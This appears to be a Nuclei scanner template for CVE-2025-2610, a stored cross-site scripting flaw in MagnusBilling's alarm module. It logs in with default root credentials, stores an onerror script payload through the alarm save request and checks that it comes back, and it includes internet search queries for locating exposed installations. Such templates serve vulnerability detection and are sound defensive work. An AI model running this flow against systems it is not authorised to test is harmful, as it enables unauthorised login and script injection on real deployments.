id: CVE-2025-2610

info:
  name: MagnusBilling Alarm Module - Cross-Site Scripting
  author: DhiyaneshDK
  severity: high
  description: |
    Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling (Alarm Module modules) allows authenticated stored cross-site scripting. This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
  impact: |
    Authenticated attackers can inject malicious HTML and JavaScript through the alarm module that persists and executes when other administrators view alarm configurations, potentially leading to session hijacking and privilege escalation.
  remediation: |
    Upgrade to MagnusBilling version 7.3.1 or later that properly sanitizes input in the alarm module.
  reference:
    - https://vulncheck.com/advisories/magnusbilling-logs-xss
    - https://chocapikk.com/posts/2025/magnusbilling/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2610
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 7.6
    cve-id: CVE-2025-2610
    cwe-id: CWE-79
    epss-score: 0.01578
    epss-percentile: 0.81901
    cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magnussolution
    product: magnusbilling
    shodan-query: http.html:"magnusbilling"
    fofa-query: body="magnusbilling"
  tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "root"
  password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}&key=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "id_agent")'
        condition: and
        internal: true

  - raw:
      - |
        POST /mbilling/index.php/alarm/save?_dc= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;

        rows={"id":0,"id_plan":0,"type":1,"amount":1,"condition":1,"status":1,"email":"{{email}}","period":3600,"creationdate":null,"subject":"test","message":"<img src=x onerror=alert(document.domain)>"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Operation was successful")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/alarm/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "idPlanname")'
        condition: and
# digest: 4a0a004730450221009daad220df0a4ccc83f6153f216a34d2f1509618d93b80da481b5918db806c7d02201b9d32437f9f43449f9f11e65e2b10c2e23e20b6e90e8e8836c10d870b287c50:922c64590222798bb761d5b6d8e72950